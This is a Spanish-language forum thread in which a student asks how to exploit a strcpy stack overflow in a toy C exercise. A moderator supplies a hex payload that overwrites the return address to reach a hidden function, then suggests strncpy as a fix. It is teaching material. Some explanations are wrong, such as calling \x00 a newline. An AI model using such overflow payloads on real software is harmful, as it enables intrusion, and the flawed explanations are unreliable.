Resultados 1 al 3 de 3

Duda diseño exploit

  1. #1 Duda diseño exploit 
    Iniciado
    Fecha de ingreso
    Dec 2012
    Mensajes
    4
    Descargas
    0
    Uploads
    0
    Hola:

    ¿Alguien me podría ayudar con el siguiente ejercicio?

    1.Dado el siguiente código fuente, diseñar un exploit que permita la función “privada”:

    #include <string.h>
    void privada (void) {
    printf("Hola función pública\n");
    }
    int main(int argc, char * argv [])
    {
    char buffer [40];
    if (argc != 2){
    printf("Necesito un argumento %d\n",argc);
    exit(-1);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n",buffer);
    return (0);
    }
    Citar  
     

  2. #2  
    Moderador Global Avatar de hystd
    Fecha de ingreso
    Jul 2005
    Ubicación
    1, 11, 21, 1211...
    Mensajes
    1.596
    Descargas
    58
    Uploads
    0
    Bienvenido! De lo que se trata es de provocar un desbordamiento (buffer overflow) aprovechando la vulnerabilidad de la función strcpy, de tal forma que logres modificar el puntero EIP para que apunte hacia donde se encuentra la parte del código que quieres ejecutar, que en tu caso, intuyo que se trata de la función "void privada (void)".

    Un posible exploit para conseguir tu objetivo podría ser el siguiente:

    Código:
    \x48\x79\x53\x54\x44\x20\x77\x77\x77\x2E\x48\x61\x63\x6B\x48\x69\x73\x70\x61\x6E
    \x6F\x2E\x63\x6F\x6D\x20\x45\x6A\x65\x6D\x70\x6C\x6F\x20\x64\x65\x20\x73\x68\x65
    \x6C\x6C\x63\x6F\x38\x10\x40\x00\x90\x90
    Tras ejecutarlo, verás un mensaje de propaganda de hackhispano , y la función "void privada (void)" ejecutándose debido al desbordamiento provocado por la función strcpy.

    Nota que en un shellcode, cuando aparezca el \x00, lo que venga después no será tenido en cuenta, por ser el caracter \n o fin de línea... (he puesto unos \x90 como ejemplo, lo que equivale a unas instrucciones NOP's, que nunca serán "ejecutados").

    La contramedida o protección para este tipo de ataques es usar la función análoga strncpy, o en su defecto, antes de llamar a strcpy, controlar la longitud con strlen, ambas no son vulnerables a desbordamientos de memoria.

    Un saludo.
    Última edición por hystd; 13-12-2012 a las 02:21
    El optimista tiene ideas, el pesimista... excusas

    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Dec 2012
    Mensajes
    4
    Descargas
    0
    Uploads
    0
    Muchas gracias.
    Citar  
     

Temas similares

  1. Duda diseño
    Por luis9rs en el foro BASES DE DATOS
    Respuestas: 5
    Último mensaje: 05-08-2010, 17:56
  2. duda con un exploit y el netcat
    Por ancabi en el foro INTRUSION
    Respuestas: 5
    Último mensaje: 31-03-2005, 16:12
  3. duda exploit/apache
    Por etirini17 en el foro INTRUSION
    Respuestas: 4
    Último mensaje: 21-02-2005, 23:06
  4. Diseño 3d
    Por clarinetista en el foro APLICACIONES
    Respuestas: 3
    Último mensaje: 15-04-2004, 00:45

Marcadores

Marcadores